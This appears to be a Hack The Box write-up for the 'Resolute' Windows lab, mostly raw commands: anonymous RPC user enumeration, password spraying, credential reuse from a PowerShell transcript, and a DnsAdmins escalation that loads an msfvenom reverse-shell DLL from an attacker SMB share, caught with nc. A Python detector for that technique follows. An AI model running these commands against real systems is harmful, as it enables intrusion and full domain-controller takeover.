Resolute

HTB Windows

nmap -A -p- -oA resolute 10.10.10.169 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA resolute 10.10.10.169

nmap -sU -O -p- -oA resolute-udp 10.10.10.169

ping -c 1 10.10.10.169

nmap -p- --open -T5 -v -n 10.10.10.169

echo "10.10.10.169 resolute.htb megabank.local" | sudo tee -a /etc/hosts

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.169 -oG allPorts

extractPorts allPorts

nmap -sCV -p53,88,135,389,445,464,593,636,3268,3269,5985,9389 10.10.10.169 -oN targeted

bc targeted -l rb

crackmapexec smb 10.10.10.169

smbclient -L 10.10.10.169 -N

smbmap -H 10.10.10.169 -u 'null'

rpcclient -U "" 10.10.10.169 -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v '0x' | tr -d '[]' > users.txt

rpcclient -U "" 10.10.10.169 -N -c "enumdomgroups"

rpcclient -U "" 10.10.10.169 -N -c "enumdomgroupmem 0x200"

rpcclient -U "" 10.10.10.169 -N -c 'queryuser 0x1f4'

rpcclient -U "" 10.10.10.169 -N -c 'querydispinfo'

cat passwords.txt

GetNPUsers megabank.local/ -no-pass -usersfile users.txt

crackmapexec smb 10.10.10.169 -u users.txt -p passwords.txt

crackmapexec winrm 10.10.10.169 -u 'melanie' -p 'Welcome123!'

evil-winrm -i 10.10.10.169 -u 'melanie' -p 'Welcome123!'

whoami

cd Desktop

type user.txt

whoami /priv

net user melanie

We see that melanie is a member of the Remote Management Users group.

dir -Force

cd PSTranscripts

dir -Force

type PowerShell_transcript.RESOLUTE.OjuoGBhU.20191203063201.txt | Select-String Admin

crackmapexec smb 10.10.10.169 -u 'ryan' -p 'Serv3r4Admin4cc123!'

crackmapexec winrm 10.10.10.169 -u 'ryan' -p 'Serv3r4Admin4cc123!'

evil-winrm -i 10.10.10.169 -u 'ryan' -p 'Serv3r4Admin4cc123!'

whoami /priv

net user ryan

whoami /all

net localgroup

net localgroup DnsAdmins

We see that Contractors is a member of the DnsAdmins group.

We go to https://lolbas-project.github.io/#dns

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f dll -o pwned.dll

smbserver.py smbFolder $(pwd) -smb2support

dnscmd.exe /config /serverlevelplugindll \\10.10.14.4\smbFolder\pwned.dll

sudo rlwrap nc -lvnp 443

Run these commands several times:

sc.exe stop dns

sc.exe start dns

When this appears, it means it executed successfully.

We now have a reverse shell.

whoami

type C:\Users\Administrator\Desktop\root.txt
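Added detection example (not part of the original writeup): a Python scan over constructed process-creation and registry-change records that flags the DnsAdmins ServerLevelPluginDll technique used above, escalating when the plugin path is a UNC share and when the same user then restarts the DNS service. The "EventID|User|Detail" record layout and the sample events are constructed; the registry value path and event IDs 4688/4657 are standard Windows ones.

```python
import re

# Constructed sample telemetry (not taken from the box): "EventID|User|Detail".
# 4688 = process creation (Detail is the command line);
# 4657 = registry value modified (Detail is "ValuePath=NewData").
SAMPLE_EVENTS = [
    "4688|MEGABANK\\svc_dns|dnscmd.exe /zoneprint megabank.local",
    "4688|MEGABANK\\ryan|dnscmd.exe /config /serverlevelplugindll \\\\10.10.14.4\\smbFolder\\pwned.dll",
    "4657|MEGABANK\\ryan|HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\ServerLevelPluginDll=\\\\10.10.14.4\\smbFolder\\pwned.dll",
    "4688|MEGABANK\\ryan|sc.exe stop dns",
    "4688|MEGABANK\\ryan|sc.exe start dns",
]

PLUGIN_CMD_RE = re.compile(r"dnscmd(?:\.exe)?\s.*?/serverlevelplugindll\s+(\S+)", re.I)
PLUGIN_REG_RE = re.compile(r"\\Services\\DNS\\Parameters\\ServerLevelPluginDll=(.+)$", re.I)
DNS_RESTART_RE = re.compile(r"^sc(?:\.exe)?\s+(?:stop|start)\s+dns\b", re.I)

def classify(event):
    """Return (user, rule, dll_path) for one suspicious event, else None."""
    event_id, user, detail = event.split("|", 2)
    if event_id == "4688":
        m = PLUGIN_CMD_RE.search(detail)
        if m:
            return (user, "dnscmd_set_plugin_dll", m.group(1))
        if DNS_RESTART_RE.match(detail):
            return (user, "dns_service_restart", None)
    elif event_id == "4657":
        m = PLUGIN_REG_RE.search(detail)
        if m:
            return (user, "registry_set_plugin_dll", m.group(1))
    return None

def scan(events):
    """Scan events in order; score each alert and escalate a DNS service
    restart when the same user changed the plugin DLL earlier in the stream."""
    alerts, plugin_set_by = [], set()
    for event in events:
        hit = classify(event)
        if hit is None:
            continue
        user, rule, path = hit
        if rule.endswith("plugin_dll"):
            plugin_set_by.add(user)
            # A UNC path means the DNS service (running as SYSTEM) loads code from a remote host.
            severity = "critical" if path.startswith("\\\\") else "high"
        elif user in plugin_set_by:
            severity = "critical"   # the restart is what makes the new DLL load
        else:
            severity = "low"        # a routine restart on its own is not conclusive
        alerts.append({"user": user, "rule": rule, "path": path, "severity": severity})
    return alerts
```

Pair this with a periodic check that the DnsAdmins group contains only the accounts that need it; the plugin value itself should normally be absent on a domain controller.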

© 2024 Cu3rv0x